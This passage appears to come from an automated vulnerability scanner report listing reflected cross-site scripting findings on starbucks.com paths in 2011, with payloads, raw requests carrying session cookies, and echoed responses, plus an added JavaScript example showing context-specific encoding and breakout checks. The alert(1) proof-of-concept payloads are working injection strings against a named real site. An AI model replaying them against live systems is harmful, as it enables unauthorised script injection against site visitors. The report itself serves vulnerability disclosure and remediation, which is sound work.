Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:36 GMT
Connection: close
Content-Length: 36863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/ethos-water-fund?81e52"style="x:expression(alert(1))"55e877cb972=1"/>
...[SNIP]...

2.292. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 711af"style="x:expression(alert(1))"aa02c4b265c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/community/starbucks-foundation?711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:29 GMT
Connection: close
Content-Length: 39409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?711af"style="x:expression(alert(1))"aa02c4b265c=1"/>
...[SNIP]...

2.293. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7705d"style="x:expression(alert(1))"c7aa8f5b401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/community/starbucks-red?7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:17 GMT
Connection: close
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?7705d"style="x:expression(alert(1))"c7aa8f5b401=1"/>
...[SNIP]...

2.294. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3411b"%3balert(1)//7724a630612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3411b";alert(1)//7724a630612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility/community/starbucks-red?3411b"%3balert(1)//7724a630612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:20 GMT
Connection: close
Content-Length: 41834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759750001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility/community/starbucks-red?3411b";alert(1)//7724a630612=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...
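Findings 2.293 and 2.294 above (and the same pair repeated for each path that follows) show the two contexts this site reflects the raw request URL into: a double-quoted HTML attribute (the og:url meta tag) and a double-quoted JavaScript string (flashvars.playerLocation). The following is an added example, not code from the scanner report or from the site: it rebuilds both reflections from the report's own payloads, applies the encoding each context needs, and includes the two checks a tester would run against a response to confirm a breakout. The renderer names and the assumption that the page reconstructs path plus decoded query string are illustrative. Note that only the expression() vector the scanner chose is IE-specific; once the closing quote is injected, any attribute (for instance an event handler) can be added in any browser, so the attribute breakout itself is not an IE-only problem.

```javascript
// Added example: the two reflection contexts in this report and the
// per-context encoding that closes them. Not code from the report or the
// site; renderer names and the URL-reconstruction logic are assumptions.

// Payloads as echoed (URL-decoded) in findings 2.293 and 2.294; the page
// rebuilt the request URL, parameter names included, into its markup.
const BASE = 'http://www.starbucks.com/responsibility/community/starbucks-red';
const ATTR_URL = BASE + '?7705d"style="x:expression(alert(1))"c7aa8f5b401=1';
const JS_URL = BASE + '?3411b";alert(1)//7724a630612=1';

// Vulnerable renderers: plain concatenation, which is what the responses show.
function renderOgUrlRaw(url) {
  return `<meta property="og:url" content="${url}"/>`;
}
function renderFlashVarsRaw(url) {
  return `flashvars.playerLocation = "${url}";`;
}

// HTML attribute context: encode the characters that can end a double-quoted
// attribute value or start new markup.
function encodeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string context: emit a complete, escaped string literal. JSON
// escaping handles quotes and backslashes; the extra replacements stop the
// literal from closing a <script> block or breaking on JS line terminators.
function encodeJsString(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderOgUrlSafe(url) {
  return `<meta property="og:url" content="${encodeHtmlAttr(url)}"/>`;
}
function renderFlashVarsSafe(url) {
  return `flashvars.playerLocation = ${encodeJsString(url)};`;
}

// Check 1 (attribute context): list the attribute names a browser would see
// on the tag. A reflected payload that closed the quote shows up as an extra
// attribute (here "style").
function attributeNames(tag) {
  return [...tag.matchAll(/([A-Za-z][\w:-]*)="[^"]*"/g)].map((m) => m[1]);
}

// Check 2 (script context): return the code that sits outside double-quoted
// string literals, honouring backslash escapes. Payload text that shows up
// here is executable, not data.
function scriptOutsideStrings(js) {
  let out = '';
  let inString = false;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (inString) {
      if (c === '\\') i++;          // skip the escaped character
      else if (c === '"') inString = false;
      continue;
    }
    if (c === '"') inString = true;
    else out += c;
  }
  return out;
}

// Demonstration on the report's payloads: raw output grows a "style"
// attribute and leaks alert(1) into code; encoded output does neither.
for (const [label, html] of [['raw', renderOgUrlRaw(ATTR_URL)], ['encoded', renderOgUrlSafe(ATTR_URL)]]) {
  console.log(label, 'og:url attributes:', attributeNames(html).join(' '));
}
for (const [label, js] of [['raw', renderFlashVarsRaw(JS_URL)], ['encoded', renderFlashVarsSafe(JS_URL)]]) {
  console.log(label, 'code outside strings:', JSON.stringify(scriptOutsideStrings(js)));
}
```

The two checks are the same distinction the scanner draws in its issue detail: for the attribute context, did the reflected quote create a new attribute; for the script context, did payload text land outside the string literal. Encoding per output context fixes both without stripping the URL; the report's own remediation note, that user data should not be echoed into a script context at all, remains the stronger option for the flashvars case.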

2.295. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c5f1"style="x:expression(alert(1))"fee707305da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/community/youth-action?6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:25 GMT
Connection: close
Content-Length: 40145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?6c5f1"style="x:expression(alert(1))"fee707305da=1"/>
...[SNIP]...

2.296. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bc26"%3balert(1)//a20621fb850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bc26";alert(1)//a20621fb850 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility/community/youth-action?6bc26"%3balert(1)//a20621fb850=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:26 GMT
Connection: close
Content-Length: 40050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ar flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96890010001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility/community/youth-action?6bc26";alert(1)//a20621fb850=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.297. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2434"style="x:expression(alert(1))"9d972ae0d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/diversity?b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:54 GMT
Connection: close
Content-Length: 38155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/diversity?b2434"style="x:expression(alert(1))"9d972ae0d9=1"/>
...[SNIP]...

2.298. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity/suppliers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ab1f"style="x:expression(alert(1))"18d18debd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/diversity/suppliers?2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:09 GMT
Connection: close
Content-Length: 39052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/diversity/suppliers?2ab1f"style="x:expression(alert(1))"18d18debd9f=1" />
...[SNIP]...

2.299. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74254"style%3d"x%3aexpression(alert(1))"cd978537e36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74254"style="x:expression(alert(1))"cd978537e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment?74254"style%3d"x%3aexpression(alert(1))"cd978537e36=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:58 GMT
Connection: close
Content-Length: 50714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment?74254"style="x:expression(alert(1))"cd978537e36=1"/>
...[SNIP]...

2.300. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/climate-change

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8714c"style%3d"x%3aexpression(alert(1))"f8e10288012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8714c"style="x:expression(alert(1))"f8e10288012 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment/climate-change?8714c"style%3d"x%3aexpression(alert(1))"f8e10288012=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:48 GMT
Connection: close
Content-Length: 40326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/climate-change?8714c"style="x:expression(alert(1))"f8e10288012=1"/>
...[SNIP]...

2.301. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bfc"style="x:expression(alert(1))"c24986dd6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment/energy?59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:26 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/energy?59bfc"style="x:expression(alert(1))"c24986dd6f7=1"/>
...[SNIP]...

2.302. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/explore-green-store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be99d"style%3d"x%3aexpression(alert(1))"dce46789f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be99d"style="x:expression(alert(1))"dce46789f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment/explore-green-store?be99d"style%3d"x%3aexpression(alert(1))"dce46789f55=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:15 GMT
Connection: close
Content-Length: 36700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/explore-green-store?be99d"style="x:expression(alert(1))"dce46789f55=1" />
...[SNIP]...

2.303. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/green-building

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81427"style%3d"x%3aexpression(alert(1))"70b16b5ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81427"style="x:expression(alert(1))"70b16b5ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment/green-building?81427"style%3d"x%3aexpression(alert(1))"70b16b5ded=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:37 GMT
Connection: close
Content-Length: 40773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/green-building?81427"style="x:expression(alert(1))"70b16b5ded=1"/>
...[SNIP]...

2.304. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/recycling

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8710"style%3d"x%3aexpression(alert(1))"183500e045d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8710"style="x:expression(alert(1))"183500e045d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment/recycling?a8710"style%3d"x%3aexpression(alert(1))"183500e045d=1 HTTP/1.1
Host: www.starbucks.com
